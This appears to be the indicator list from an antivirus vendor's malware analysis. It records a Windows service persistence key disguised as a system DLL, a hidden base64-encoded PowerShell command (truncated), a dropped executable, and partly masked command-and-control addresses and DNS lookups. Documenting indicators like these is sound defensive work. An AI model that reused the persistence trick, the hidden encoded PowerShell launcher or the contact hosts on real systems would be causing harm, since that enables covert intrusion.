Technical information
- [<HKLM>\System\CurrentControlSet\Services\api-ms-win-core-processenvironment-l1-1-0] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\api-ms-win-core-processenvironment-l1-1-0] 'ImagePath' = '"%WINDIR%\SysWOW64\api-ms-win-core-processenvironment-l1-1-0\api-ms-win-core-processenvironme...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAHEAbgBkAHMAdQBhAHIAZAB6AD0AJwBUAHgAdwBoAGgAbAB1AHAAbQB1AG8AYQAnADsAJABCAGgAYgBiAGkAYgB6AG4AYwBnAGwAcQAgAD0AIAAnADgAMAA1ACcAOwAkAE8AYgBrAGcAYQBvAHQAeABvAGoAbABiAHUAPQAnAEQAYwB4AG8AaQBiAH...
- %HOMEPATH%\805.exe
- %HOMEPATH%\805.exe to %WINDIR%\syswow64\api-ms-win-core-processenvironment-l1-1-0\api-ms-win-core-processenvironment-l1-1-0.exe
- '60.##.240.192':80
- '12#.#39.65.177':80
- '14#.#10.171.237':8080
- http://nv#.##tsmartz.net/zod/gedkhogBs/
- http://14#.###.171.237:8080/cTPRhhh6/3rPsWqyy04a/lHtSYIsZhnD/ via 14#.#10.171.237
- DNS ASK 9j###iss.com
- DNS ASK nv#.##tsmartz.net
- DNS ASK tb########rakat.000webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAHEAbgBkAHMAdQBhAHIAZAB6AD0AJwBUAHgAdwBoAGgAbAB1AHAAbQB1AG8AYQAnADsAJABCAGgAYgBiAGkAYgB6AG4AYwBnAGwAcQAgAD0AIAAnADgAMAA1ACcAOwAkAE8AYgBrAGcAYQBvAHQAeABvAGoAbABiAHUAPQAnAEQAYwB4AG8AaQBiAH...' (with hidden window)